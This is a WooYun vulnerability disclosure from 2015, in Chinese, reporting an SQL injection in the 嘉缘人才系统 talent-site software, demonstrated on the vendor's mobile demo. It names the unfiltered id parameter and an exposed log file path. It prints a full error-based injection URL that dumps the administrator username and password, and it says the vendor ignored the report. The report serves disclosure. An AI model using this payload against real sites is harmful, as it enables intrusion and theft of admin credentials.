当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101191

漏洞标题:嘉缘人才系统一处sql注入(demo测试成功)

相关厂商:finereason.com

漏洞作者: 牛肉包子

提交时间:2015-03-13 17:54

修复时间:2015-06-16 17:57

公开时间:2015-06-16 17:57

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-13: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-12: 细节向核心白帽子及相关领域专家公开
2015-05-22: 细节向普通白帽子公开
2015-06-01: 细节向实习白帽子公开
2015-06-16: 细节向公众公开

简要描述:

官网DEMO测试

详细说明:

黑盒发现
嘉缘人才系统触屏版demo:

http:/m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963


其中id没有过滤

4.png


其中mysql报错,根据
WooYun: 嘉缘人才系统最新版sql注入(直接出数据)
获得日志文件路径为
http://m.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt
构造如下exp

http://m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 %0aand%0a@`'`%0aand%0a(SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(a_user,0x27,a_pass)) FROM job_admin limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)%23


成功爆出管理员密码

8.png


漏洞证明:

8.png

修复方案:

intval

版权声明:转载请注明来源 牛肉包子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-16 17:57

厂商回复:

最新状态:

暂无